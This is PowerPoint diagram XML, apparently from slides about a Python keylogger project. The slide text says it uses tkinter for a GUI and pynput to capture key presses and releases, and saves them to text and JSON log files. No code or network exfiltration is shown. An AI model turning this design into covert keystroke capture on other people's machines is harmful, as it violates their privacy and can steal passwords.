              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>generate-Json-file(keys used): Writes the keystroke events to key_log.Json in JSON format</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2B3BF653-1576-40D9-B3DD-DDEBEC62E0DA}" type="parTrans" cxnId="{8DD22B1D-FCAD-4481-B321-6508E2D74621}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2B2F3DD5-8F93-4699-A97D-1F18C086AD77}" type="sibTrans" cxnId="{8DD22B1D-FCAD-4481-B321-6508E2D74621}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7559DF9D-CDD3-45AC-80CB-05D0F925AC93}" type="pres">
      <dgm:prSet presAssocID="{E592B9A2-91CA-4167-81C3-2B08981ECB5A}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EBEAA052-B204-4B8E-999B-BBCA56A2AB22}" type="pres">
      <dgm:prSet presAssocID="{E592B9A2-91CA-4167-81C3-2B08981ECB5A}" presName="fgShape" presStyleLbl="fgShp" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3E5EAD3B-99B6-4C7F-89EA-0300FF0E7BC9}" type="pres">
      <dgm:prSet presAssocID="{E592B9A2-91CA-4167-81C3-2B08981ECB5A}" presName="linComp" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3836DF00-F4EC-4248-A710-9BC748FAF007}" type="pres">
      <dgm:prSet presAssocID="{E9E0DCAF-9301-4287-9B05-6BBDF9BC64B1}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{33024D0E-65E2-46AB-8295-CDB0E6AB60C5}" type="pres">
      <dgm:prSet presAssocID="{E9E0DCAF-9301-4287-9B05-6BBDF9BC64B1}" presName="bkgdShape" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3" custLinFactNeighborX="-95"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{36BBF7D4-5E43-4A38-AF56-F568A0BF733A}" type="pres">
      <dgm:prSet presAssocID="{E9E0DCAF-9301-4287-9B05-6BBDF9BC64B1}" presName="nodeTx" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7F0E90A3-9429-4BD7-B46F-161B8F845F70}" type="pres">
      <dgm:prSet presAssocID="{E9E0DCAF-9301-4287-9B05-6BBDF9BC64B1}" presName="invisiNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{6C31DE76-D49C-451C-8907-4C861ADEA3F6}" type="pres">
      <dgm:prSet presAssocID="{E9E0DCAF-9301-4287-9B05-6BBDF9BC64B1}"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dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{4A6F81A7-4168-4D1E-8B9F-2609E74DBF93}" type="pres">
      <dgm:prSet presAssocID="{3EFBA6A7-6719-4CEB-A90C-D211AC498AD8}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{343F8BD7-E15E-45E7-8790-ED1006DA1C49}" type="pres">
      <dgm:prSet presAssocID="{A434C0B5-06B0-43FC-B736-B04BC743CCB3}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{805DCDAA-6710-47A6-85D6-3828FE2432E3}" type="pres">
      <dgm:prSet presAssocID="{A434C0B5-06B0-43FC-B736-B04BC743CCB3}" presName="bkgdShape" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16D21E28-C3B2-43F8-A34C-D672F7BDEF29}" type="pres">
      <dgm:prSet presAssocID="{A434C0B5-06B0-43FC-B736-B04BC743CCB3}" presName="nodeTx" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9ECD5924-C6D0-4ACA-8255-BFC8851FA4E5}" type="pres">
      <dgm:prSet presAssocID="{A434C0B5-06B0-43FC-B736-B04BC743CCB3}" presName="invisiNode" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{77C3B04E-8443-4F0A-AE4E-68EBD24E3328}" type="pres">
      <dgm:prSet presAssocID="{A434C0B5-06B0-43FC-B736-B04BC743CCB3}"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8C98071-B3EB-4B4A-8BD0-C3F1014FF4B4}" type="pres">
      <dgm:prSet presAssocID="{2B2F3DD5-8F93-4699-A97D-1F18C086AD77}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1DCAE23E-5C31-4A9C-AE9E-0D91B6537B7F}" type="pres">
      <dgm:prSet presAssocID="{2622105B-354A-455E-8C1C-5479F85199D2}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1D5C839B-2F50-4942-9FC2-E5FBE55CC1C7}" type="pres">
      <dgm:prSet presAssocID="{2622105B-354A-455E-8C1C-5479F85199D2}" presName="bkgdShape" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3" custLinFactNeighborY="404"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3D05FE25-3AB7-4169-B776-2D89BFA75DDA}" type="pres">
      <dgm:prSet presAssocID="{2622105B-354A-455E-8C1C-5479F85199D2}" presName="nodeTx" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{036DDBC8-60AC-4813-A96F-FFACD0114598}" type="pres">
      <dgm:prSet presAssocID="{2622105B-354A-455E-8C1C-5479F85199D2}" presName="invisiNode" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A9EBEFC0-F5EF-48C3-A240-EBC14D2D5BAB}" type="pres">
      <dgm:prSet presAssocID="{2622105B-354A-455E-8C1C-5479F85199D2}"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Lst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{577CA70B-C1E8-4350-9574-4F3099E4E137}" type="presOf" srcId="{2622105B-354A-455E-8C1C-5479F85199D2}" destId="{1D5C839B-2F50-4942-9FC2-E5FBE55CC1C7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{8DD22B1D-FCAD-4481-B321-6508E2D74621}" srcId="{E592B9A2-91CA-4167-81C3-2B08981ECB5A}" destId="{A434C0B5-06B0-43FC-B736-B04BC743CCB3}" srcOrd="1" destOrd="0" parTransId="{2B3BF653-1576-40D9-B3DD-DDEBEC62E0DA}" sibTransId="{2B2F3DD5-8F93-4699-A97D-1F18C086AD77}"/>
    <dgm:cxn modelId="{9E56553C-1899-451C-987B-29DA9095AE54}" type="presOf" srcId="{3EFBA6A7-6719-4CEB-A90C-D211AC498AD8}" destId="{4A6F81A7-4168-4D1E-8B9F-2609E74DBF93}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{16CF1C6B-FA85-4579-9194-0DF6BFD707A4}" srcId="{E592B9A2-91CA-4167-81C3-2B08981ECB5A}" destId="{E9E0DCAF-9301-4287-9B05-6BBDF9BC64B1}" srcOrd="0" destOrd="0" parTransId="{FB80902E-7F97-447D-88D8-04D08CF237FE}" sibTransId="{3EFBA6A7-6719-4CEB-A90C-D211AC498AD8}"/>
    <dgm:cxn modelId="{AEBA8E72-4C17-4CDD-BA77-6426532E2288}" type="presOf" srcId="{2B2F3DD5-8F93-4699-A97D-1F18C086AD77}" destId="{78C98071-B3EB-4B4A-8BD0-C3F1014FF4B4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{5FF99F54-1646-4610-8D38-32C4AD3F4DCA}" type="presOf" srcId="{E592B9A2-91CA-4167-81C3-2B08981ECB5A}" destId="{7559DF9D-CDD3-45AC-80CB-05D0F925AC93}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{7BAF418D-51F5-45A5-A244-089D9579CC9F}" type="presOf" srcId="{E9E0DCAF-9301-4287-9B05-6BBDF9BC64B1}" destId="{33024D0E-65E2-46AB-8295-CDB0E6AB60C5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{D404D69A-31EB-4EED-B800-010595E854F1}" type="presOf" srcId="{A434C0B5-06B0-43FC-B736-B04BC743CCB3}" destId="{805DCDAA-6710-47A6-85D6-3828FE2432E3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{0E768EA6-B87F-4751-A314-81CE43522BD8}" srcId="{E592B9A2-91CA-4167-81C3-2B08981ECB5A}" destId="{2622105B-354A-455E-8C1C-5479F85199D2}" srcOrd="2" destOrd="0" parTransId="{463513E4-F8BB-48E9-AB1F-39E799C65CBF}" sibTransId="{4108A579-E36E-401E-895A-F89E345D79AE}"/>
    <dgm:cxn modelId="{3DAC01D5-EA43-45BD-AA2F-B75C77BB6726}" type="presOf" srcId="{2622105B-354A-455E-8C1C-5479F85199D2}" destId="{3D05FE25-3AB7-4169-B776-2D89BFA75DDA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{316EC1DA-2240-4F8F-B997-FE9AF206E280}" type="presOf" srcId="{E9E0DCAF-9301-4287-9B05-6BBDF9BC64B1}" destId="{36BBF7D4-5E43-4A38-AF56-F568A0BF733A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{0C6A7BF5-99BE-4924-A848-5741D5C52A7D}" type="presOf" srcId="{A434C0B5-06B0-43FC-B736-B04BC743CCB3}" destId="{16D21E28-C3B2-43F8-A34C-D672F7BDEF29}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{E1CEBD7E-AC0A-499E-BC95-EAC0660D3AC8}" type="presParOf" srcId="{7559DF9D-CDD3-45AC-80CB-05D0F925AC93}" destId="{EBEAA052-B204-4B8E-999B-BBCA56A2AB22}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{E066F7A2-F234-4DFB-B7F9-2176AE02C223}" type="presParOf" srcId="{7559DF9D-CDD3-45AC-80CB-05D0F925AC93}" destId="{3E5EAD3B-99B6-4C7F-89EA-0300FF0E7BC9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{FE5EECE5-FE82-4D87-89B4-4BD65969E284}" type="presParOf" srcId="{3E5EAD3B-99B6-4C7F-89EA-0300FF0E7BC9}" destId="{3836DF00-F4EC-4248-A710-9BC748FAF007}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{EF7B3B71-709E-45F7-B546-E2D3DC0E608B}" type="presParOf" srcId="{3836DF00-F4EC-4248-A710-9BC748FAF007}" destId="{33024D0E-65E2-46AB-8295-CDB0E6AB60C5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{FCF0746F-2560-4B79-A498-3CE9D71B0401}" type="presParOf" srcId="{3836DF00-F4EC-4248-A710-9BC748FAF007}" destId="{36BBF7D4-5E43-4A38-AF56-F568A0BF733A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{AB9E839F-00D6-4874-9367-6C86706C820E}" type="presParOf" srcId="{3836DF00-F4EC-4248-A710-9BC748FAF007}" destId="{7F0E90A3-9429-4BD7-B46F-161B8F845F70}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{9871971F-5C5C-4D25-93FF-DF9466664035}" type="presParOf" srcId="{3836DF00-F4EC-4248-A710-9BC748FAF007}" destId="{6C31DE76-D49C-451C-8907-4C861ADEA3F6}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{5760FAAE-9A6F-4D3E-8CEA-C97E71186BEC}" type="presParOf" srcId="{3E5EAD3B-99B6-4C7F-89EA-0300FF0E7BC9}" destId="{4A6F81A7-4168-4D1E-8B9F-2609E74DBF93}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{FB800897-CB0D-4FF7-9634-6ECD3670496D}" type="presParOf" srcId="{3E5EAD3B-99B6-4C7F-89EA-0300FF0E7BC9}" destId="{343F8BD7-E15E-45E7-8790-ED1006DA1C49}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{A84E724E-BFBC-4D3D-8CB6-8235AD20B00F}" type="presParOf" srcId="{343F8BD7-E15E-45E7-8790-ED1006DA1C49}" destId="{805DCDAA-6710-47A6-85D6-3828FE2432E3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{A5CAB307-C5A4-46D3-B08C-AF5731C533A0}" type="presParOf" srcId="{343F8BD7-E15E-45E7-8790-ED1006DA1C49}" destId="{16D21E28-C3B2-43F8-A34C-D672F7BDEF29}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{EBE864E7-7235-4960-B8AF-F8BCD27DF882}" type="presParOf" srcId="{343F8BD7-E15E-45E7-8790-ED1006DA1C49}" destId="{9ECD5924-C6D0-4ACA-8255-BFC8851FA4E5}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{CA431248-E1BD-49DC-A076-F292870F6B39}" type="presParOf" srcId="{343F8BD7-E15E-45E7-8790-ED1006DA1C49}" destId="{77C3B04E-8443-4F0A-AE4E-68EBD24E3328}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{A5298F83-D0D1-42DF-8B2A-4698D953BFED}" type="presParOf" srcId="{3E5EAD3B-99B6-4C7F-89EA-0300FF0E7BC9}" destId="{78C98071-B3EB-4B4A-8BD0-C3F1014FF4B4}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{418603C4-5457-4297-8B11-C147B04C82DB}" type="presParOf" srcId="{3E5EAD3B-99B6-4C7F-89EA-0300FF0E7BC9}" destId="{1DCAE23E-5C31-4A9C-AE9E-0D91B6537B7F}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{71CD06E5-9240-45DC-979E-DBC68883208E}" type="presParOf" srcId="{1DCAE23E-5C31-4A9C-AE9E-0D91B6537B7F}" destId="{1D5C839B-2F50-4942-9FC2-E5FBE55CC1C7}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{70FD96ED-D73A-44D1-B897-1F213A97C8C4}" type="presParOf" srcId="{1DCAE23E-5C31-4A9C-AE9E-0D91B6537B7F}" destId="{3D05FE25-3AB7-4169-B776-2D89BFA75DDA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{8FEEFDA0-31A1-4931-8355-AD70279B4933}" type="presParOf" srcId="{1DCAE23E-5C31-4A9C-AE9E-0D91B6537B7F}" destId="{036DDBC8-60AC-4813-A96F-FFACD0114598}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#2"/>
    <dgm:cxn modelId="{DE9CFAFE-AC32-4891-ABB5-A9E83624E126}" type="presParOf" srcId="{1DCAE23E-5C31-4A9C-AE9E-0D91B6537B7F}" destId="{A9EBEFC0-F5EF-48C3-A240-EBC14D2D5BAB}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList7#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90B8E1-BECA-40E2-B443-CC2EB583F086}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/chevron2" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1#1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2#3" csCatId="accent1" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4780940B-923C-4778-931B-DA50DF0E44A6}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>1.Libraries and Modules</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" dirty="0">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D11905C4-5E48-432C-A711-9E78AB41E47F}" type="parTrans" cxnId="{CBB0A796-1C54-4734-8609-6656A593898D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8FED9F2E-B73E-4847-B1A9-4DE9AE5280C1}" type="sibTrans" cxnId="{CBB0A796-1C54-4734-8609-6656A593898D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{401540F2-3546-4794-BEAD-60CA708BBAB6}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>tkinter: Used to create the GUI.</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1400" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{54B4A0DD-5C6D-4486-8FD8-8CAA3C76CB65}" type="parTrans" cxnId="{B95A625F-24DA-4550-90F3-27C2ABEB8FEB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6DFD1F17-3FD3-401A-8A69-361AC873BE83}" type="sibTrans" cxnId="{B95A625F-24DA-4550-90F3-27C2ABEB8FEB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F016D6A4-F0D1-44E6-A9C1-4397386AEC60}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>2.Variables:</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" dirty="0">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8C3ABE91-4711-4952-BA95-D68DA402F924}" type="parTrans" cxnId="{D2A11E25-D4D7-4818-A62A-CFBDD2EE633D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1E209288-2789-4D00-B8B7-4A7DC4318AF2}" type="sibTrans" cxnId="{D2A11E25-D4D7-4818-A62A-CFBDD2EE633D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1F51DD1D-47FA-4C0D-92F5-B48A2892A005}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>keys_used: A list to store the keys along with their state (pressed, held, released).</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1400" dirty="0">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7A6286B7-B2AB-404B-A061-0EB73C99DA88}" type="parTrans" cxnId="{6B13063C-85E1-4E59-A943-FF265B823758}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CE8B9346-1891-4138-A2D2-85B21D39A5D1}" type="sibTrans" cxnId="{6B13063C-85E1-4E59-A943-FF265B823758}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E1F47546-0038-4E34-8235-DB4E120A8819}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1100" dirty="0"/>
            <a:t>3.</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>Functions</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1100" dirty="0"/>
            <a:t>:</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1100" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3B291FE7-7E4E-46CF-BC93-9585970DC962}" type="parTrans" cxnId="{5FA3092F-5397-45A6-93DC-90E70E315015}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1B5977E2-D5ED-4B03-BCA3-8B18E14CF84D}" type="sibTrans" cxnId="{5FA3092F-5397-45A6-93DC-90E70E315015}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C343BE0B-75CF-4C54-BA97-348A26A1E6BE}">
      <dgm:prSet phldrT="[Text]" custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:rPr>
            <a:t>generate_text_log(key): Writes the accumulated keystrokes to a text file (key_log.txt).</a:t>
          </a:r>
          <a:endParaRPr lang="en-IN" sz="1400" dirty="0">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F183B01D-C58B-41E9-8EC5-4CAFBD0DBFDF}" type="parTrans" cxnId="{32891C6E-CABF-412A-8691-ABAF94696CE2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3A8C1605-E6FB-45A2-ABB1-D2060505844C}" type="sibTrans" cxnId="{32891C6E-CABF-412A-8691-ABAF94696CE2}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3BE6992C-6AD3-486B-9320-C83FA1B633C5}">
      <dgm:prSet custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="1400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>pynput.keyboard: Used to listen for keyboard events (key presses and releases).</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" dirty="0">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{17FE506C-C0F5-4B8B-A5DF-168F6D43144F}" type="parTrans" cxnId="{8390B210-CD43-40DD-91A4-16D07A65F011}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-IN"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
